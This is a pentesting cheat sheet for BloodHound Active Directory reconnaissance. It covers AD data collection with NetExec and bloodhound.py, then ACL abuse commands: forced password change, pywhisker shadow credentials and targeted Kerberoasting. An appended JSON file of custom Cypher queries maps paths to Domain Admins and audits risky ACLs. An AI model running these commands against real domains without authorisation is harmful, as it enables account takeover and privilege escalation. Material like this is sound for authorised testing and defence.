Bloodhound CheatSheet


1.0 Installation

apt install bloodhound

2.0 Configuration

neo4j console
2025-01-03 14:44:26.560+0000 INFO  Bolt enabled on localhost:7687.
2025-01-03 14:44:27.123+0000 INFO  Remote interface available at http://localhost:7474/
2025-01-03 14:44:27.125+0000 INFO  id:

Browse to http://localhost:7474/, log in with the default credentials neo4j:neo4j and change the password to something better before loading any data.

3.0 Usage

Run with:

bloodhound

3.1 Collect AD Data

3.1.1 NetExec

nxc ldap $ip -u $user -p $pass
nxc ldap $ip -u $user -p $pass --bloodhound --collection All
nxc ldap $ip -u $user -p $pass --bloodhound --collection All --dns-server $dnsip

3.1.2 bloodhound.py

git clone https://github.com/dirkjanm/BloodHound.py

# Method 1 (DNS IP):
python bloodhound.py -d $domain.local -u $user -p $pass -c All,LoggedOn -dc $dcname.$domain.local --zip -ns $dnsip

# Method 2 (DNS Name):
python bloodhound.py -d $domain -c All,LoggedOn --zip -ns $dnsserv -u $user@$domain -p $pass

3.2 Attribute Attacks

3.2.1 ForceChangePassword

net rpc password $targetuser $targetpass -U 'domain.local/'$user'%'$pass -S 'domain.local'

3.2.2 GenericAll

Manipulate msDS-KeyCredentialLink and request a TGT:

pywhisker -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
python targetedKerberoast.py -v -d 'domain.local' -u $user -p $pass

Afterwards, crack the hash with hashcat:

![[hashcat#1.2 Kerberos TGT]]

3.2.3 GenericWrite

4.0 Hints

  • Mark all owned users as owned!
  • Select user and check AD permissions
    • Node info
    • Transitive Object Control
    • local admin

4.1 Custom Queries

git clone https://github.com/CompassSecurity/BloodHoundQueries
cd BloodHoundQueries
BloodHound_Custom_Queries_Merger
./bloodhound-customqueries-downloader
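The following customqueries.json is an added example for this note, not a file from the CompassSecurity repository or from the BloodHound project. It assumes the legacy BloodHound client that `apt install bloodhound` ships, which on Linux reads custom queries from ~/.config/bloodhound/customqueries.json (this path and the "queries"/"queryList" layout are the legacy client's format). The first query relies on the "Mark as owned" hint above (the `owned` property on user nodes); the second audits which non-admin principals hold the ForceChangePassword, GenericAll and GenericWrite edges covered in section 3.2, so that those ACLs can be reviewed and removed. The `-512` and `-519` suffixes are the well-known RIDs of Domain Admins and Enterprise Admins.

```json
{
  "queries": [
    {
      "name": "Shortest paths from owned users to Domain Admins",
      "category": "Owned",
      "queryList": [
        {
          "final": true,
          "query": "MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group)) WHERE g.objectid ENDS WITH '-512' RETURN p",
          "allowCollapse": true
        }
      ]
    },
    {
      "name": "Non-admin principals holding ForceChangePassword, GenericAll or GenericWrite",
      "category": "ACL audit",
      "queryList": [
        {
          "final": true,
          "query": "MATCH p=(n)-[r:ForceChangePassword|GenericAll|GenericWrite]->(m) WHERE (n:User OR n:Group) AND NOT n.objectid ENDS WITH '-512' AND NOT n.objectid ENDS WITH '-519' AND n.name <> m.name RETURN p",
          "allowCollapse": true
        }
      ]
    }
  ]
}
```

After saving the file, restart BloodHound (or use the refresh icon next to "Custom Queries" in the Analysis tab) and the two entries appear under their categories. The second query is the one worth running on a domain you defend: every edge it returns is a delegated right that lets the source principal take over the target without being a member of an admin group.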

5.0 References

6.0 Tags

  • #OS/Kali
  • #Label/CheatSheet
  • #public